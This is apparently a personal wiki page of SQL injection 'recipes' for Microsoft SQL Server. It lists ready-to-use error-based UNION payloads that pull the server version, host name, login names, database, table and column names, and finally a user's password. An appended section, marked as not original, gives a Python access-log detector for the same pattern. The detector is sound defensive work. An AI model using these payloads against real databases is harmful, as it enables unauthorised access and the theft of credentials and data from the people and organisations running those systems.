SQL Injection Recipes
From Rory.wiki
OK, so this is designed to be a series of "recipes" with indicative queries that help in different situations. Personally I can never remember all the ins and outs of SQL syntax off the top of my head, so writing these out will hopefully help :)
Error-Based MS-SQL in a SELECT statement
For use when the initial ' character brings back an SQL error message but it's not possible to get a viable UNION statement working to return the queried information to the client. You will still need to match the number of columns in the UNION, so if you get the error below, placing 1, a number of times before the CAST expression should sort that.
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
' UNION SELECT cast(@@version as int);--
The number of quotes at the start of the query may vary based on what's required to close out open quotes. Adding ) characters might also be needed to close out open brackets.
This will return the version of the database in an error message.
' UNION SELECT cast(host_name() as int);--
Will return the host name of the database server.
' UNION SELECT cast(user_name() as int);--
So if you can't get UNION returning to the screen, it'll be necessary to bring back individual items as error messages.
' UNION SELECT TOP 1 cast(name as int) from master..syslogins;--
This brings back the first name out of the syslogins table. To get the others, add NOT IN and WHERE clauses to the query, so assuming the first name returned was sa, you could use this query to get the next one.
' UNION SELECT TOP 1 cast(name as int) from master..syslogins where name not in ('sa');--
Other helpful areas that follow the same concept are:
This provides a database name, and the list of NOT INs can be extended as names come back.
'' UNION SELECT TOP 1 cast(name as int) FROM master..sysdatabases where name not in ('master','tempdb','model','msdb');--
This provides a table name from the database "DBName".
'' UNION SELECT TOP 1 cast(name as int) FROM DBName..sysobjects where xtype='U' AND name NOT IN ('tableOne');--
This looks for column names containing the string "login" in a database called DBName and a table called TableName.
'' UNION SELECT TOP 1 cast(DBName..syscolumns.name as int) from DBName..syscolumns,DBName..sysobjects WHERE DBName..syscolumns.id=DBName..sysobjects.id AND DBName..sysobjects.name='TableName' AND DBName..syscolumns.name LIKE '%login%';--
Assuming you then find a column called "loginname", you can use this kind of query to get entries out of it.
'' UNION SELECT TOP 1 cast(DBName..TableName.loginname as int) from DBName..TableName;--
And then, assuming there's a user called rorym in that table, getting a password for them would go something like this.
'' UNION SELECT TOP 1 cast(DBName..TableName.password as int) from DBName..TableName where DBName..TableName.loginname LIKE 'rorym';--
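Added here as a defensive counterpart, not part of the original wiki page: a Python detector that picks out requests following this CAST-as-int recipe from access-log lines, and reads the NOT IN list to show how far the enumeration has got. The log format, the regular expressions and the sample lines are my own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from any real system), one request
# per line: client_ip "METHOD path?query" status
SAMPLE_LOG = """\
10.0.0.5 "GET /products?id=42" 200
10.0.0.9 "GET /products?id=42'+UNION+SELECT+cast(%40%40version+as+int);--" 500
10.0.0.9 "GET /products?id=42'+UNION+SELECT+TOP+1+cast(name+as+int)+from+master..syslogins;--" 500
10.0.0.9 "GET /products?id=42'+UNION+SELECT+TOP+1+cast(name+as+int)+from+master..syslogins+where+name+not+in+('sa');--" 500
10.0.0.7 "GET /search?q=union+station+cast+iron" 200
"""

# The recipe always has three parts: a quote (or bracket) to break out of the
# original statement, UNION SELECT to add a row, and CAST(... AS INT) to force
# the conversion error that leaks the value. Requiring all three in order keeps
# ordinary text such as "union station cast iron" from being flagged.
RECIPE_RE = re.compile(
    r"""['")]\s*union\s+select\b.*?\bcast\s*\(.+?\bas\s+int\s*\)""", re.IGNORECASE)

# Each item already pulled back is added to NOT IN (...), so its members show
# how far the enumeration of logins, databases or tables has progressed.
NOT_IN_RE = re.compile(r"\bnot\s+in\s*\(([^)]*)\)", re.IGNORECASE)

LINE_RE = re.compile(r'^(\S+) "(\w+) ([^" ]+)" (\d{3})$')


def parse_line(line):
    """Split one access-log line into its fields, URL-decoding the query."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    path, _, query = target.partition("?")
    return {"ip": ip, "method": method, "path": path,
            "query": unquote_plus(query), "status": int(status)}


def flag_error_based_union(log_text):
    """Return one finding per request that matches the CAST-as-int recipe."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec or not RECIPE_RE.search(rec["query"]):
            continue
        m = NOT_IN_RE.search(rec["query"])
        excluded = [v.strip(" '\"") for v in m.group(1).split(",")] if m else []
        findings.append({"ip": rec["ip"], "path": rec["path"],
                         "status": rec["status"], "excluded": excluded})
    return findings
```

Running flag_error_based_union(SAMPLE_LOG) flags the three 10.0.0.9 requests and leaves the two ordinary ones alone; the last finding's excluded list is ['sa'].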